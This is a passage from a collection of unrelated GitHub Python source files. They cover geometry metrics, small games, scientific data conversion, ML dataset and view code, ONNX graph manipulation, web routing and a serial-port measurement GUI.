mask_iou\n\n >>> full_mask = np.ones((10, 10)).astype('uint8')\n >>> quarter_mask = np.zeros((10, 10)).astype('uint8')\n >>> quarter_mask[0:5, 0:5] = 1\n\n >>> iou = mask_iou(mask_true=full_mask, mask_detection=quarter_mask)\n\n >>> iou\n ... 0.25\n ```\n \"\"\"\n _validate_mask(mask=mask_true)\n _validate_mask(mask=mask_detection)\n\n if mask_true.shape != mask_detection.shape:\n raise ValueError(f\"mask_true and mask_detection should have equal shapes.\")\n\n area_intersection = (mask_true & mask_detection).astype('uint8')\n area_union = (mask_true | mask_detection).astype('uint8')\n\n if np.sum(area_union) == 0:\n return None\n\n return np.sum(area_intersection) / np.sum(area_union)\n\n\ndef _validate_box(box: Tuple[float, float, float, float]):\n if type(box) != tuple or len(box) != 4 or box[0] >= box[2] or box[1] >= box[3]:\n raise ValueError(\n f\"Bounding box must be defined as four elements tuple: (x_min, y_min, x_max, y_max), \"\n f\"where x_min < x_max and y_min < y_max. {box} given.\"\n )\n\n\ndef _validate_boxes_batch(boxes_batch: np.ndarray):\n if type(boxes_batch) != np.ndarray or len(boxes_batch.shape) != 2 or boxes_batch.shape[1] != 4:\n raise ValueError(\n f\"Bounding boxes batch must be defined as 2d np.array with (N, 4) shape, {boxes_batch} given\"\n )\n\n\ndef _validate_mask(mask: np.ndarray):\n if type(mask) != np.ndarray or mask.dtype != 'uint8' or len(mask.shape) != 2 or mask.min() < 0 or mask.max() > 1:\n raise ValueError(\n f\"Mask must be defined as 2d np.array with np.uint8 type and binary values (0/1). {mask} given.\"\n )\n","repo_name":"SkalskiP/onemetric","sub_path":"onemetric/cv/utils/iou.py","file_name":"iou.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"21"} +{"seq_id":"5926831583","text":"from tkgpio import TkCircuit\n\n# initialize the circuit inside the GUI\n\nconfiguration = {\n \"width\": 300,\n \"height\": 200,\n \"lcds\": [\n {\"x\": 30, \"y\": 40, \"name\": \"LCD\", \"pins\":[2, 3, 4, 5, 6, 7], \"columns\": 16, \"lines\": 2}\n ],\n \"buttons\": [\n {\"x\": 30, \"y\": 130, \"name\": \"Press to toggle LED 2\", \"pin\": 11},\n ]\n}\n\ncircuit = TkCircuit(configuration)\n@circuit.run\ndef main ():\n \n # now just write the code you would use in a real Raspberry Pi\n \n from gpiozero import LED, Button\n from time import sleep\n from Adafruit_CharLCD import Adafruit_CharLCD\n \n \n lcd = Adafruit_CharLCD(2, 3, 4, 5, 6, 7, 16, 2)\n \n global count\n count = 0\n \n \n def show_next_characters():\n global count\n \n print(f\"Showing characters from code {count} to {count+31}\")\n \n string = \"\"\n for i in range(0, 32):\n string += chr(count)\n if i == 15:\n string += \"\\n\"\n count += 1\n \n lcd.clear()\n lcd.message(string)\n \n button = Button(11)\n button.when_pressed = show_next_characters\n \n show_next_characters()\n \n \n while True:\n sleep(0.1)\n","repo_name":"wallysalami/tkgpio","sub_path":"docs/examples/test_LCD.py","file_name":"test_LCD.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"21"} +{"seq_id":"37429429736","text":"import random\n# v 1.0\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players,\nand reports both Player's scores each round.\"\"\"\n\nmoves = ['rock', 'paper', 'scissors']\n\n\"\"\"The Player class is the parent class for all of the Players\nin this game\"\"\"\n\n\nclass Player:\n def __init__(self):\n self.my_previous_move = random.choice(moves)\n self.their_previous_move = random.choice(moves)\n\n def move(self):\n return 'rock'\n\n def learn(self, my_move, their_move):\n self.my_previous_move = my_move\n self.their_previous_move = their_move\n\n\nclass Random_Player(Player):\n def move(self):\n return random.choice(moves)\n\n\nclass Human_Player(Player):\n def move(self):\n self.hand = input(\"What will you play?\" +\n \" Rock, Paper or Scissors?\\n\").lower()\n if self.hand in moves:\n return self.hand\n else:\n print(\"Not a valid move\")\n self.move()\n\n\nclass Reflect_Player(Player):\n def move(self):\n return self.their_previous_move\n\n\nclass Cycle_Player(Player):\n def move(self):\n n = moves.index(self.my_previous_move)\n if n == 2:\n return moves[0]\n else:\n return moves[n+1]\n\n\nclass Game:\n def __init__(self, p1, p2):\n self.p1 = p1\n self.p2 = p2\n self.p1.score = 0\n self.p2.score = 0\n\n def play_round(self):\n move1 = self.p1.move()\n move2 = self.p2.move()\n print(f\"Player 1: {move1} Player 2: {move2}\")\n self.beats(move1, move2)\n self.p1.learn(move1, move2)\n self.p2.learn(move2, move1)\n\n def post_game(self):\n print(f\"Final score P1: {self.p1.score}, P2: {self.p2.score}\")\n if self.p1.score > self.p2.score:\n print(f\"Player 1 Wins with {self.p1.score} points!\\n\")\n elif self.p1.score < self.p2.score:\n print(f\"Player 2 Wins with {self.p2.score} points!\\n\")\n elif self.p1.score == self.p2.score:\n print(\"TIE BREAKER ROUND!!\")\n self.play_round()\n self.post_game()\n\n def play_again(self):\n another = input(\"play another 3 rounds or quit? quit/play?\\n\").lower()\n if another == \"play\":\n self.play_game()\n elif another == \"quit\":\n print(\"Game over!\")\n else:\n print(\"invalid command\")\n self.play_again\n\n def play_game(self):\n print(\"Game start!\")\n for round in range(3):\n print(f\"P1: {self.p1.score}, P2: {self.p2.score}\")\n print(f\"Round {round}:\")\n self.play_round()\n self.post_game()\n self.play_again()\n\n def beats(self, move1, move2):\n if move1 == move2:\n print(\"This round is a tie no winner \\n\")\n elif move1 == 'rock':\n if move2 == 'scissors':\n self.p1.score += 1\n print(\"Player 1 wins this round \\n\")\n else:\n self.p2.score += 1\n print(\"Player 2 wins this round \\n\")\n elif move1 == 'scissors':\n if move2 == 'paper':\n self.p1.score += 1\n print(\"Player 1 wins this round \\n\")\n else:\n self.p2.score += 1\n print(\"Player 2 wins this round \\n\")\n elif move1 == 'paper':\n if move2 == 'rock':\n self.p1.score += 1\n print(\"Player 1 wins this round\\n\")\n else:\n self.p2.score += 1\n print(\"Player 2 wins this round \\n\")\n\n\nif __name__ == '__main__':\n game = Game(Human_Player(), Random_Player())\n game.play_game()\n","repo_name":"hamjahb/rock-paper-scisors","sub_path":"rock paper scisors.py","file_name":"rock paper scisors.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70533303732","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 06 11:18:32 2016\n\n@author: Ferriss\n\nConvert .CSV files of polarized FTIR measurements of untreated Kunlun and \nJaipur diopside to tab-delimited txt file appropriate for upload to the \nPULI database, http://puli.mfgi.hu\nFirst column: wavenumber\nSecond column: absorbances\nNormalized to cm\n\nWavenumber range 2700-4000 cm-1 following the example on the PULI website.\n\n\"\"\"\n\nimport cpx_spectra as sp\nimport numpy as np\nimport csv\n#import matplotlib.pyplot as plt\nimport pynams.pynams \n\nreload(pynams)\nreload(sp)\n\nKunlun_list = [sp.ave_K6_Ea, sp.ave_K6_Eb, sp.ave_K6_Ec] \nJ2_list = [sp.J2_Ea, sp.J2_Eb, sp.J2_Ec] # My Jaipur diopside sample J2\n\nspec_list = J2_list + Kunlun_list\nname_list = ['Jaipur_diopside_Ea', 'Jaipur_diopside_Eb', 'Jaipur_diopside_Ec',\n 'Kunlun_diopside_Ea', 'Kunlun_diopside_Eb', 'Kunlun_diopside_Ec', ]\n\nwn_high_puli = 4000.\nwn_low_puli = 2500.\n\nfor idx, spec in enumerate(spec_list):\n spec.divide_by_thickness()\n idx_hi = (np.abs(spec.wn_full-wn_high_puli)).argmin()\n idx_lo = (np.abs(spec.wn_full-wn_low_puli)).argmin()\n\n wn_puli = spec.wn_full[idx_lo:idx_hi]\n abs_puli = spec.abs_full_cm[idx_lo:idx_hi]\n \n fig, ax = spec.plot_spectrum(wn_xlim_left=wn_high_puli,\n wn_xlim_right=wn_low_puli)\n \n filename = 'Ferriss_' + name_list[idx] + '_puli.txt'\n \n with open(filename, 'wb') as pulifile:\n spamwriter = csv.writer(pulifile, dialect='excel-tab')\n for idx_wn, wn in enumerate(wn_puli):\n spamwriter.writerow([wn, abs_puli[idx_wn]])\n","repo_name":"EFerriss/HydrogenCpx","sub_path":"HydrogenCpx/puli_database_prep.py","file_name":"puli_database_prep.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365958452","text":"# Express P/Q mod m \n\n# Input : p , q , m\n\n# Output: integer value representing P/Q modulo m\n\ndef mod(p,q,m):\n p = p % m \n inv = pow(q, m-2, m) \n ans=(inv*p) % m\n return ans","repo_name":"bhatnitish1998/aps-2020","sub_path":"pq-1 mod m.py","file_name":"pq-1 mod m.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15184649585","text":"from django.shortcuts import render\n\nfrom joblib import load\nmodel = load('./savedModels/learnandbuild.joblib')\n\ndef predictor(request):\n if request.method == 'POST':\n tenure = request.POST['tenure']\n SeniorCitizen = request.POST['SeniorCitizen']\n Contract = request.POST['Contract']\n PaperlessBilling = request.POST['PaperlessBilling']\n MonthlyCharges = request.POST['MonthlyCharges']\n y_pred = model.predict([[ tenure\t,SeniorCitizen,\tContract\t,PaperlessBilling,\tMonthlyCharges]])\n if y_pred[0] == 0:\n y_pred = 'Not Churn'\n elif y_pred[0] == 1:\n y_pred = 'Churn'\n else:\n y_pred = 'Virginica'\n return render(request, 'result.html', {'result' : y_pred})\n return render(request, 'main.html')\n","repo_name":"Jatinyadav7362/Churn_Prediction","sub_path":"irisApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23031931127","text":"# deque 안쓰면 효율성 검사 1번 불합.. 쓰면 통과\nfrom collections import deque\ndef solution(people, limit):\n answer = 0\n people = deque(sorted(people))\n while people :\n if len(people) == 1 :\n answer += 1\n break\n if people[0] + people[-1] <= limit :\n people.pop()\n people.popleft()\n else :\n people.pop()\n answer += 1\n return answer","repo_name":"seoyeon08/Algorithm_Study","sub_path":"programmers/Lev2/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31327221139","text":"import requests, json\nfrom bs4 import BeautifulSoup\n\nresponse = requests.get('https://coloniae.space/static/mycolony_version.json')\n\nsoup = BeautifulSoup(response.text, features=\"html.parser\").text\n\nmycolonyversion = json.loads(soup)['mycolony_version']\n\nprint(mycolonyversion)\n\nimageslink = 'https://www.apewebapps.com/apps/my-colony/'+mycolonyversion+'/images/'\n\nresponse = requests.get(imageslink)\n\nsoup = BeautifulSoup(response.text, features=\"html.parser\")\n\nlinks = soup.find_all('a', href=True)\n\nwith open('linkslist.txt', 'w') as file:\n for link in links:\n if link['href'][-4:] in ['.png', '.svg']:\n file.write(imageslink+link['href']+'\\n')\n\nprint('now run:')\nprint('wget -q -i linkslist.txt\\nfind . -name \"*.1\" -type f -delete')\n","repo_name":"ultimepipolo/coloniae-public","sub_path":"static/media/gametiles/get_links_list.py","file_name":"get_links_list.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19043957532","text":"import numpy as np\nimport torch\nimport torch.utils.data as data\nfrom torchvision import datasets, transforms\nimport os\nfrom PIL import Image, ImageOps\n\nclass KvasirSEG_Dataset(data.Dataset):\n\n def __init__(self, root=None, dataset_type='train',cross='1', transform=None):\n #self.h_image_size, self.w_image_size = image_size[0], image_size[1]\n self.dataset_type = dataset_type\n self.transform = transform\n self.cross = cross\n\n self.item_image = np.load(root + \"datamodel/{}_data_{}.npy\".format(self.dataset_type, self.cross)) \n self.item_gt = np.load(root + \"datamodel/{}_label_{}.npy\".format(self.dataset_type, self.cross)) \n print(np.bincount(self.item_gt.flatten())) \n\n\n def __getitem__(self, index):\n items_im = self.item_image\n items_gt = self.item_gt\n img_name = items_im[index]\n label_name = items_gt[index]\n label_name = np.where(label_name>200, 1, 0)\n\n image = Image.fromarray(np.uint8(img_name))\n mask = Image.fromarray(np.uint8(label_name))\n\n #mask = np.eye(2)[mask]\n\n if self.transform:\n image, mask = self.transform(image, mask)\n\n return image, mask\n\n def __len__(self):\n return len(self.item_image)\n\n\n\n","repo_name":"usagisukisuki/Adaptive_t-vMF_Dice_loss","sub_path":"Kvasir-SEG/mydataset.py","file_name":"mydataset.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"37937834352","text":"import numpy as np\nimport warnings\n\n\ndef merge_reshape_nodes(model):\n \"\"\"\n Version specific for 0.4.1 and 1.0.x\n A sequence of constant-reshape nodes with consistent blob flow\n corresponds to one holistic Reshape layer in caffe.\n This method merges the nodes into one node corresponding\n to that layer.\n \"\"\"\n import onnx\n\n nodes = model.graph.node[:]\n del model.graph.node[:]\n\n idx = 0\n while idx < len(nodes):\n node = nodes[idx]\n if node.op_type != \"Constant\":\n model.graph.node.extend([node])\n idx += 1\n continue\n\n constant_node = node\n while idx < len(nodes):\n idx += 1\n if idx >= len(nodes):\n break\n node = nodes[idx]\n if node.op_type != \"Reshape\":\n model.graph.node.extend([constant_node])\n break\n reshape_node = node\n assert constant_node.output[0] in reshape_node.input\n reshape_node.input.remove(constant_node.output[0])\n\n constant_attributes = dict(\n zip(\n [attr.name for attr in constant_node.attribute],\n constant_node.attribute,\n )\n )\n shape = np.frombuffer(\n constant_attributes[\"value\"].t.raw_data, dtype=np.int64\n )\n reshape_node.attribute.add(\n ints=shape, name=\"shape\", type=onnx.AttributeProto.INTS\n )\n model.graph.node.extend([reshape_node])\n idx += 1\n break\n\n\ndef delete_reshape_nodes(model):\n\n nodes = model.graph.node[:]\n del model.graph.node[:]\n\n idx = 0\n while idx < len(nodes):\n if nodes[idx].op_type != \"Reshape\":\n\n model.graph.node.extend([nodes[idx]])\n idx += 1\n continue\n else:\n temp_idx = idx + 1\n repeat_mark = False\n repeat_nodes = []\n use_mark = False\n if temp_idx >= len(nodes):\n model.graph.node.extend([nodes[idx]])\n else:\n while temp_idx < len(nodes):\n if nodes[temp_idx].op_type == \"Reshape\":\n if nodes[idx].output[0] in nodes[temp_idx].input:\n repeat_nodes.append(nodes[temp_idx])\n repeat_mark = True\n else:\n if nodes[idx].output[0] in nodes[temp_idx].input:\n use_mark = True\n temp_idx += 1\n\n if repeat_mark == True and use_mark == False:\n for temp_node in repeat_nodes:\n temp_node.input[0] = nodes[idx].input[0]\n else:\n model.graph.node.extend([nodes[idx]])\n idx += 1\n","repo_name":"ModelTC/NART","sub_path":"python/nart/tools/pytorch/network_utils/reshape.py","file_name":"reshape.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"19095826113","text":"import json\n\nif __name__ == \"__main__\":\n with open(\"complex_ddi_residues.json\", \"r\") as handle:\n complex_residues = json.load(handle)\n\n hydrophobicity = {'A':.41,'R':-.14,'N':-.28,'D':-.55,'C':.49,'E':-.31,\n 'Q':-.1,'G':0,'H':0.08,'I':.99,'L':.97,'K':-.23,'M':.74,\n 'F':1.0,'P':-.46,'S':-.05,'T':.13,'W':.97,'Y':.63,'V':.76}\n\n avg_rel_hyd = {}\n \n for comp in complex_residues:\n vals = [hydrophobicity[aa] for aa in complex_residues[comp]]\n mean = sum(vals) / len(vals)\n avg_rel_hyd[comp.upper()] = mean\n \n planarity = {}\n with open(\"planarity_results.csv\", \"r\") as handle:\n for line in handle:\n line = line.strip(\"\\n\").split(\",\")\n if line[0] != \"5H7I\":\n planarity[line[0]] = line[1]\n\n planars = [avg_rel_hyd[comp] for comp in planarity if planarity[comp] == \"planar\"]\n nonplanars = [avg_rel_hyd[comp] for comp in planarity if planarity[comp] == \"nonplanar\"]\n \n\n with open(\"hydrophobicity_by_planarity.csv\", \"w\") as out:\n out.write(\"planars,nonplanars\")\n out.write(\"\\n\")\n for idx, num in enumerate(planars):\n try:\n out.write(\",\".join([str(num), str(nonplanars[idx])]))\n out.write(\"\\n\")\n except IndexError:\n out.write(\",\".join([str(num), \"NA\"]))\n out.write(\"\\n\")\n\n","repo_name":"wigasper/ddi-planarity","sub_path":"analysis/hydrophobicity_analysis.py","file_name":"hydrophobicity_analysis.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5394781945","text":"import re\nimport io\n\ncamel_to_snake_pattern = re.compile(\"(.)([A-Z][a-z]+)\")\ncamel_to_snake_pattern2 = re.compile(\"([a-z0-9])([A-Z])\")\n\n\ndef camel_to_snake(name):\n # name = re.sub(\"(.)([A-Z][a-z]+)\", r\"\\1_\\2\", name)\n # return re.sub(\"([a-z0-9])([A-Z])\", r\"\\1_\\2\", name).lower()\n name = camel_to_snake_pattern.sub(r\"\\1_\\2\", name)\n return camel_to_snake_pattern2.sub(r\"\\1_\\2\", name).lower()\n\n\ndef iterable_to_stream(\n iterable, buffer_size=io.DEFAULT_BUFFER_SIZE\n) -> io.BufferedReader:\n \"\"\"\n Lets you use an iterable (e.g. a generator) that yields bytestrings as a read-only\n input stream.\n\n The stream implements Python 3's newer I/O API (available in Python 2's io module).\n For efficiency, the stream is buffered.\n \"\"\"\n\n class IterStream(io.RawIOBase):\n def __init__(self):\n self.leftover = None\n\n def readable(self):\n return True\n\n def readinto(self, b):\n try:\n length = len(b) # We're supposed to return at most this much\n chunk = self.leftover or next(iterable)\n output, self.leftover = chunk[:length], chunk[length:]\n b[: len(output)] = output\n return len(output)\n except StopIteration:\n return 0 # indicate EOF\n\n return io.BufferedReader(IterStream(), buffer_size=buffer_size)\n\n\nclass RequiredParameterCheck(object):\n \"\"\"A decorator that checks if at least on named parameter is present\"\"\"\n\n MODE_OR = 0\n MODE_AND = 1\n\n def __init__(self, required, mode=MODE_OR):\n self.required = sorted(required)\n self.mode = mode\n\n def __call__(self, func):\n def wrapper(*args, **kwargs):\n found_paramater = sorted([req for req in self.required if req in kwargs])\n if self.mode == self.MODE_OR and found_paramater:\n return func(*args, **kwargs)\n elif self.mode == self.MODE_AND and found_paramater == self.required:\n return func(*args, **kwargs)\n else:\n raise ValueError(\n f\"Required parameter `{', '.join(self.required)}` is missing.\"\n )\n\n wrapper.__name__ = func.__name__\n wrapper.__dict__.update(func.__dict__)\n wrapper.__doc__ = func.__doc__\n return wrapper\n","repo_name":"FORMOBILE/CLOUDxTRACT","sub_path":"src/extractor/common/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29926040492","text":"\"\"\"Routes configuration\n\nThe more specific and detailed routes should be defined first so they\nmay take precedent over the more generic routes. For more information\nrefer to the routes manual at http://routes.groovie.org/docs/\n\"\"\"\nfrom routes import Mapper\n\ndef make_map(config):\n \"\"\"Create, configure and return the routes Mapper\"\"\"\n map = Mapper(directory=config['pylons.paths']['controllers'],\n always_scan=config['debug'])\n map.minimization = False\n\n # The ErrorController route (handles 404/500 error pages); it should\n # likely stay at the top, ensuring it can always be resolved\n map.connect('/error/{action}', controller='error')\n map.connect('/error/{action}/{id}', controller='error')\n\n # CUSTOM ROUTES HERE\n\n map.connect('home', '/', controller='home', action='index')\n # proxied items\n map.connect('about', '/about', controller='home', action='about')\n map.connect('get-involved', '/get-involved', controller='home',\n action='get_involved')\n\n map.connect('proxy', '/proxy', controller='proxy', action='index')\n map.connect('sparql', '/sparql', controller='sparql', action='index')\n map.connect('search', '/search', controller='search', action='index')\n map.connect('graph', '/graph', controller='graph', action='index')\n map.connect('add', '/add', controller='graph', action='add')\n map.connect('import', '/import', controller='remote', action='index')\n map.connect('uuid', '/api/uuidalloc', controller='uuidalloc', action='index')\n\n map.connect(\"isbn\", \"/isbn/{isbn}\", controller=\"isbn\", action=\"index\")\n map.connect(\"isbn\", \"/isbn\", controller=\"isbn\", action=\"index\")\n\n map.connect(\"collection\", \"/collection/search\", controller=\"collection\",\n action=\"search\")\n map.connect(\"collection\", \"/collection/\", controller=\"collection\",\n action=\"create\",\n conditions=dict(method=['POST']))\n map.connect(\"collection\", \"/collection/{collection}\", controller=\"collection\",\n action=\"update\",\n conditions=dict(method=['POST']))\n map.connect(\"collection\", \"/collection/{collection}\", controller=\"collection\", action=\"index\")\n map.connect(\"collection\", \"/collection\", controller=\"collection\", action=\"index\")\n\n map.connect(\"modeview\", \"/modelview\", controller=\"modelview\", action=\"index\")\n\n # map.connect(\"changeset\", \"/changeset/{changeset}\", \n # controller=\"changeset\", action=\"view\")\n map.connect(\"changesets\", \"/changeset\", \n controller=\"changeset\", action=\"index\")\n\n map.connect('/account', controller='account', action='index')\n map.connect('/account/login', controller='account', action='login')\n map.connect('/account/logout', controller='account', action='logout')\n map.connect('/account/{username}', controller='account', action='view')\n\n # for the time being catch everything but soon we will be more specific\n # e.g. restrict to work|person|entity ...\n map.connect('/*path', controller='graph', action='index')\n\n return map\n","repo_name":"rufuspollock/openbiblio-old","sub_path":"openbiblio/config/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40005952171","text":"# --------3.4 Tower Of Hanoi Problem--------\nclass Node:\n def __init__(self, val, nextNode = None):\n self.val = val\n self.nextNode = nextNode\n \nclass Stack:\n def __init__(self, name):\n self.top = None\n self.name = name\n self.length = 0\n def push(self, val):\n n = Node(val)\n n.nextNode = self.top\n self.top = n\n self.length += 1\n return self\n \n def pop(self):\n val = self.top.val\n if(self.top !=None ):\n self.top = self.top.nextNode\n self.length -= 1\n # print(\"The length of the stack after pop is \", self.length)\n else:\n self.top = None\n return val\n \n def show(self):\n temp = self.top\n while(temp):\n print(\"Value in stack \", self.name, \" : \",temp.val)\n temp = temp.nextNode\n\ndef toh(n, fromStack, toStack, auxStack):\n if(n == 1):\n toStack.push(fromStack.pop())\n print(\"Move \", n)\n return \n toh(n-1, fromStack, auxStack, toStack)\n print(\"Move \", n)\n toStack.push(fromStack.pop())\n toh(n-1, auxStack, toStack, fromStack)\n \nstackA = Stack(\"A\")\nstackB = Stack(\"B\")\nstackC = Stack(\"C\")\nn = int(input())\nfor i in range(n,0, -1 ):\n stackA.push(i)\ntoh(n, stackA, stackC, stackB)\nstackA.show()\nstackB.show()\nstackC.show()\n","repo_name":"Aman-Malhotra/Cracking_The_Coding_Interview_Book_Solutions_PYTHON","sub_path":"3/3.4.py","file_name":"3.4.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73567262453","text":"import tkinter as tk\r\nfrom tkinter import *\r\nimport serial\r\nimport serial.tools.list_ports\r\nimport time\r\nimport threading\r\nimport numpy as np\r\n\r\nglobal meters_exists, meters_single, meters_cont, measurements\r\n\r\nBAUD = 19200\r\nlaunch_time = time.time()\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Power Measurement\")\r\n\r\n\r\n# Method to offload continuous polling of device to Daemon Thread\r\ndef MeasureOnThread(COM, entry, idx):\r\n global is_on\r\n\r\n ser = serial.Serial(COM, BAUD, timeout=.1)\r\n start = time.time()\r\n\r\n # While the continuous run button is still on, keep reading!\r\n while is_on[idx]:\r\n ser.write(b'v')\r\n output = ser.readline()\r\n entry.delete(0, \"end\")\r\n entry.insert(0, output.decode() + \" dB\")\r\n # entry.insert(0, str(round((time.time()-start), 2)) + \" dBm\") # for debugging!!!\r\n time.sleep(.1)\r\n ser.close()\r\n\r\n\r\n# Method to take Single Measurement of selected meter\r\ndef TakeSingleMeasurement(COM, entry, idx):\r\n if not is_on[idx]:\r\n ser = serial.Serial(COM, BAUD, timeout=.1)\r\n ser.write(b'v')\r\n output = ser.readline()\r\n entry.delete(0, \"end\")\r\n entry.insert(0, output.decode() + \" dB\")\r\n # entry.insert(0, time.time()-launch_time) # for debugging!!!\r\n ser.close()\r\n\r\n\r\n# Method to start Continuous Measurement of selected meter\r\ndef TakeContMeasurement(COM, entry, this_button, idx, set_all):\r\n global is_on\r\n if not is_on[idx]:\r\n is_on[idx] = True\r\n this_button.config(fg=\"black\", bg=\"yellow\")\r\n\r\n # Why did I use a Daemon Thread?\r\n # Because it closes the serial connection upon closing the program.\r\n # Bad Programming Practice? Maybe.\r\n # Solves the problem? Also, maybe.\r\n t1 = threading.Thread(daemon=True, target=MeasureOnThread, args=(COM, entry, idx))\r\n t1.start()\r\n elif not set_all:\r\n is_on[idx] = False\r\n this_button.config(fg=\"black\", bg=\"white\")\r\n\r\n\r\n# Method to stop Continuous Measurement of selected meter\r\ndef StopContMeasurement(this_button, idx):\r\n is_on[idx] = False\r\n this_button.config(fg=\"black\", bg=\"white\")\r\n\r\n\r\n# Method to start Continuous Measurement of all active meters\r\ndef TakeContMeasurementAll(comlist):\r\n global meters_exists, measurements, meters_cont, is_on\r\n for idx in range(len(meters_exists)):\r\n if meters_exists[idx]:\r\n com = checklist[idx].cget('text')\r\n TakeContMeasurement(com, measurements[idx], meters_cont[idx], idx, True)\r\n\r\n\r\n# Method to stop Continuous Measurement of all active meters\r\ndef StopContMeasurementAll(comlist):\r\n global meters_exists, measurements, meters_cont, is_on\r\n for idx in range(len(meters_exists)):\r\n if meters_exists[idx] and is_on[idx]:\r\n com = checklist[idx].cget('text')\r\n StopContMeasurement(meters_cont[idx], idx)\r\n\r\n\r\n# Method to take Single Measurement of all active meters\r\ndef TakeSingleMeasurementAll(comlist):\r\n global meters_exists, measurements, meters_single\r\n for idx in range(len(meters_exists)):\r\n if meters_exists[idx]:\r\n com = checklist[idx].cget('text')\r\n TakeSingleMeasurement(com, measurements[idx], idx)\r\n\r\n\r\n# Adds GUI objects when COM is checked\r\ndef DisplayMeasurementGUI(COM, idx):\r\n global meters_single, meters_cont, measurements\r\n\r\n # tk.Entry for measurement output\r\n measurements[idx] = tk.Entry(justify=\"center\")\r\n measurements[idx].insert(0, \"dB\")\r\n measurements[idx].grid(row=idx, column=1)\r\n\r\n # tk.Button for single measure\r\n meters_single[idx] = tk.Button(text=\"Measure\", command=lambda: TakeSingleMeasurement(COM, measurements[idx], idx),\r\n fg=\"black\", bg=\"white\")\r\n meters_single[idx].grid(row=idx, column=2)\r\n\r\n # tk.Button for continuous measure\r\n meters_cont[idx] = tk.Button(text=\"Continuous Measure\",\r\n command=lambda: TakeContMeasurement(COM, measurements[idx],\r\n meters_cont[idx], idx, False),\r\n fg=\"black\", bg=\"white\")\r\n meters_cont[idx].grid(row=idx, column=3, padx=(5, 5), pady=(2, 2))\r\n root.geometry(\"\")\r\n\r\n\r\n# Removes GUI objects when COM is unchecked\r\ndef RemoveMeasurementGUI(COM, idx):\r\n meters_single[idx].grid_remove()\r\n meters_cont[idx].grid_remove()\r\n measurements[idx].grid_remove()\r\n return\r\n\r\n# Whenever checklist is updated, go through and add/remove any buttons\r\ndef UpdateMeters(checklist, varlist):\r\n global meters_exists\r\n for i in range(len(checklist)):\r\n com = checklist[i].cget('text')\r\n if varlist[i].get() == 1 and not meters_exists[i]:\r\n meters_exists[i] = True\r\n DisplayMeasurementGUI(com, i)\r\n elif varlist[i].get() == 0 and meters_exists[i]:\r\n meters_exists[i] = False\r\n RemoveMeasurementGUI(com, i)\r\n\r\n\r\n# Here lies the actual code\r\nports = serial.tools.list_ports.comports() # get all COM ports\r\n\r\n# for keeping track of selected COM ports\r\nchecklist = np.empty(shape=(len(ports),), dtype=tk.Checkbutton)\r\nvarlist = np.empty(shape=(len(ports),), dtype=IntVar)\r\n\r\n# is_on - for all COM ports, if continuous read is on\r\n# meters_exist - for all COM ports, if port is checked = True\r\n# meters_single - np.array for single measure tk.Button\r\n# meters_cont - np.array for continuous measure tk.Button\r\n# measurements - np.array for measurement output tk.Entry\r\nglobal is_on, meters_exists, meters_single, meters_cont, measurements\r\nis_on = np.full_like(checklist, False)\r\nmeters_exists = np.full_like(checklist, False)\r\nmeters_single = np.empty_like(checklist, dtype=tk.Button)\r\nmeters_cont = np.empty_like(checklist, dtype=tk.Button)\r\nmeasurements = np.empty_like(checklist, dtype=tk.Entry)\r\nports = sorted(ports) # sort in increasing numeric order\r\n\r\n# Placing all the widgets\r\nfor i in range(len(checklist)):\r\n ID = ports[i][0]\r\n varlist[i] = IntVar()\r\n checklist[i] = tk.Checkbutton(root, text=ID, variable=varlist[i], onvalue=1, offvalue=0,\r\n command=lambda: UpdateMeters(checklist, varlist))\r\n checklist[i].grid(row=i, column=0)\r\n\r\n# Single Measure All\r\nsingle_measureAllButton = tk.Button(text=\"Single Measure All\", fg=\"black\", bg=\"white\",\r\n command=lambda: TakeSingleMeasurementAll(checklist))\r\nsingle_measureAllButton.grid(row=len(checklist), column=0, padx=(5, 10), pady=(10, 10))\r\n\r\n# Continuous Measure All start\r\ncont_measureAllButton = tk.Button(text=\"Continuous Measure All\", fg=\"black\", bg=\"white\",\r\n command=lambda: TakeContMeasurementAll(checklist))\r\ncont_measureAllButton.grid(row=len(checklist), column=1, padx=(5, 10), pady=(10, 10))\r\n\r\n# Continuous Measure All stop\r\ncont_measureAllButton_stop = tk.Button(text=\"Stop Measure All\", fg=\"black\", bg=\"white\",\r\n command=lambda: StopContMeasurementAll(checklist))\r\ncont_measureAllButton_stop.grid(row=len(checklist), column=2, 